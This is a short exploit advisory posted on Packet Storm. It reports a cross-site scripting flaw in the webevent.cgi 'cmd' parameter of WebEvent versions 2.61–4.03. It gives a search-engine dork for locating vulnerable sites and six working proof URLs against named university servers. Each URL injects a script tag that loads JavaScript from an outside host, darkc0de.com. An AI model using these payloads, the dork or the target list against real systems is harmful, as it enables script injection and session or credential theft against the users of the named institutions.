WebEvent versions 2.61 through 4.03 suffer from cross site scripting vulnerabilities.
79cf5563d520b9d6fcaec1c7eb584bbb4eceb600821d9559b2ed928da0520d04
# Title : WebEvent(tm) webevent.cgi Cross-Site Scripting Vulnerability
# Description : WebEvent(tm) is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
# Software : http://www.webevent.com/
# Author : d3hydr8
# Contact : d3hydr8[at]gmail[dot]com
# Original Post : http://forum.darkc0de.com/index.php?action=vthread&forum=12&topic=184
# Dork : intext:"Powered by WebEvent (tm)." inurl:"/webevent.cgi"
# Greets : mozi, whoami, icqbomber
#Proof :
http://w4.eku.edu/cgi-bin/webevent/webevent.cgi?cmd=%22%3CSCRIPT+SRC=http://www.darkc0de.com/xss.js%3E%3C/SCRIPT%3E
WebEvent 2.61
http://calendar.purdue.edu/cgi-bin/webevent.cgi?cmd=%22%3CSCRIPT+SRC=http://www.darkc0de.com/xss.js%3E%3C/SCRIPT%3E
WebEvent 2.7
http://webcal.usf.edu/cgi-bin/webevent.cgi?cmd=%22%3CSCRIPT+SRC=http://www.darkc0de.com/xss.js%3E%3C/SCRIPT%3E
WebEvent 2.71
http://events.haas.berkeley.edu/webevent.cgi?cmd=%22%3CSCRIPT+SRC=http://www.darkc0de.com/xss.js%3E%3C/SCRIPT%3E
WebEvent 2.72
http://research.yale.edu/cgi-bin/mcdougal/publish2.72/webevent.cgi?cmd=%22%3CSCRIPT+SRC=http://www.darkc0de.com/xss.js%3E%3C/SCRIPT%3E
WebEvent 2.72
http://ic-server02.info-commons.uiowa.edu/cgi-bin/webevent.cgi?cmd=%22%3CSCRIPT+SRC=http://www.darkc0de.com/xss.js%3E%3C/SCRIPT%3E
WebEvent 4.03
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed